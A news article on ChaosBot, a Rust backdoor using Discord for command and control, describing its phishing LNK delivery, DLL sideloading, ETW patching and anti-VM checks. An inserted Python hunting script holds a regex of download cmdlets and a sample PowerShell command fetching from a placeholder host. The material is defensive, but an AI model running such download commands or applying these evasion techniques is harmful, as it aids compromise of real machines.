ChaosBot Malware Emerges: Rust-Based Threat Hijacks PCs via Discord
- John Jordan
A new and sophisticated malware strain, dubbed ChaosBot, has been identified by cybersecurity researchers. This Rust-based backdoor utilizes Discord channels for command and control (C2), allowing attackers to remotely manage compromised computers. The malware's emergence highlights the evolving tactics of cybercriminals and the need for advanced defense strategies.
Key Takeaways
Discord as a C2: ChaosBot leverages Discord for command and control, a novel approach for malware operations.
Rust Programming Language: Written in Rust, the malware is designed for stealth and efficiency.
Evasion Techniques: Patches Event Tracing for Windows (ETW) to blind endpoint monitoring and aborts execution when it detects a virtual machine.
Broader Chaos Family: Appears to be part of a larger, evolving threat landscape, with related ransomware variants exhibiting destructive capabilities.
Initial Access and Distribution
Researchers first detected ChaosBot in late September 2025 within a financial services organization. The initial compromise was achieved through stolen credentials for a Cisco VPN and an over-privileged Active Directory account named 'serviceaccount.' Attackers then used Windows Management Instrumentation (WMI) to deploy the malware across the network.
Alternatively, ChaosBot has been distributed via phishing messages containing a malicious Windows shortcut (.LNK) file. When opened, this file executes a PowerShell command to download and run the malware, while simultaneously displaying a decoy PDF document to distract the user.
Command and Control via Discord
ChaosBot derives its name from the Discord profile of its operator, who uses the online moniker "chaos_00019." This individual, along with another user, "lovebb0024," manages the Discord channels used for C2 operations. Infected machines connect to these channels to receive instructions.
The malware supports several commands, including:
shell: Execute shell commands via PowerShell.
scr: Capture and upload screenshots.
download: Download files to the victim's device.
upload: Upload a file from the victim's device to the Discord channel.
Advanced Evasion and Persistence
To avoid detection, ChaosBot employs several sophisticated techniques:
DLL Sideloading: It uses a legitimate Microsoft Edge binary, identity_helper.exe, to load its malicious payload (msedge_elf.dll), making it harder to distinguish from normal system processes.
Reverse Proxy: The malware establishes a fast reverse proxy (FRP) to maintain persistent access to the compromised network. It has also been observed attempting to use Visual Studio Code Tunnel services for similar purposes.
Anti-Virtual Machine: ChaosBot checks for common Virtual Machine MAC address prefixes (VMware, VirtualBox) and terminates its execution if a virtualized environment is detected, a tactic to thwart analysis.
ETW Patching: It patches Event Tracing for Windows (ETW) functions to disable monitoring by endpoint detection and response (EDR) tools.
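The LNK-to-PowerShell lure and the identity_helper.exe / msedge_elf.dll sideload described above are both visible in ordinary process-creation and image-load telemetry. The following hunting heuristic is an added example, not code from the article or from the researchers who analysed ChaosBot; the Edge install directories in the allowlist, the event field names and the sample events are assumptions constructed for illustration.

```python
import re
from typing import Optional

# Directories where identity_helper.exe and msedge_elf.dll normally reside.
# Assumed allowlist: adjust to the Edge install footprint in your estate.
EDGE_DIRS = (
    r"c:\program files\microsoft\edge\application",
    r"c:\program files (x86)\microsoft\edge\application",
)
# Cmdlets and utilities a download-and-run one-liner typically invokes.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)

SIDELOAD_HOST = "identity_helper.exe running outside the Edge install directory"
SIDELOAD_DLL = "msedge_elf.dll loaded from a non-Edge path"
LNK_LURE = "explorer.exe spawned powershell.exe with a download cmdlet"

def _in_edge_dir(path: str) -> bool:
    return path.lower().startswith(EDGE_DIRS)

def classify(event: dict) -> Optional[str]:
    """Label one Sysmon-style event, or return None if it looks benign."""
    if event["type"] == "process_create":
        image = event["image"].lower()
        parent = event.get("parent_image", "").lower()
        # Sideloading host copied out of its signed install location
        if image.endswith(r"\identity_helper.exe") and not _in_edge_dir(image):
            return SIDELOAD_HOST
        # LNK lure: Explorer launches PowerShell that fetches something
        if (image.endswith(r"\powershell.exe") and parent.endswith(r"\explorer.exe")
                and DOWNLOAD_RE.search(event.get("command_line", ""))):
            return LNK_LURE
    elif event["type"] == "image_load":
        loaded = event["image_loaded"].lower()
        # Payload DLL carrying the Edge name but not living in the Edge directory
        if loaded.endswith(r"\msedge_elf.dll") and not _in_edge_dir(loaded):
            return SIDELOAD_DLL
    return None

def hunt(events: list) -> list:
    """Return (event id, finding) pairs for every event that matches a heuristic."""
    return [(e["id"], f) for e in events if (f := classify(e))]

# Constructed sample telemetry (paths and the version directory are made up).
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\128.0.0.0"
DROP = r"C:\Users\Public\Libraries"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create", "image": EDGE + r"\identity_helper.exe",
     "parent_image": EDGE + r"\msedge.exe", "command_line": "identity_helper.exe"},
    {"id": 2, "type": "process_create", "image": DROP + r"\identity_helper.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "command_line": "identity_helper.exe"},
    {"id": 3, "type": "image_load", "image": DROP + r"\identity_helper.exe",
     "image_loaded": DROP + r"\msedge_elf.dll"},
    {"id": 4, "type": "process_create", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -Command Invoke-WebRequest http://placeholder.invalid/x"},
    {"id": 5, "type": "process_create", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -Command Get-Date"},
]
```

Running `hunt(SAMPLE_EVENTS)` flags events 2, 3 and 4 and leaves the legitimate Edge helper and the harmless PowerShell invocation alone; in production, feed it your EDR or Sysmon events and tune the allowlist and regex against local false positives.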
The Broader Chaos Threat
ChaosBot is linked to a larger family of malware, including a C++ variant of Chaos ransomware. This ransomware has evolved to include destructive capabilities, such as irrevocably deleting large files instead of encrypting them. It also features clipboard hijacking to redirect cryptocurrency transactions to attacker-controlled wallets.
These evolving threats necessitate a shift in defense strategies, moving beyond signature-based detection to prioritize behavioral monitoring, robust credential management, and proactive threat hunting.
Sources
New Rust-Based Malware "ChaosBot" Uses Discord Channels to Control Victims' PCs, The Hacker News.
New Rust-Based Malware "ChaosBot" Uses Discord Channels to Hijack PCs, TechJuice.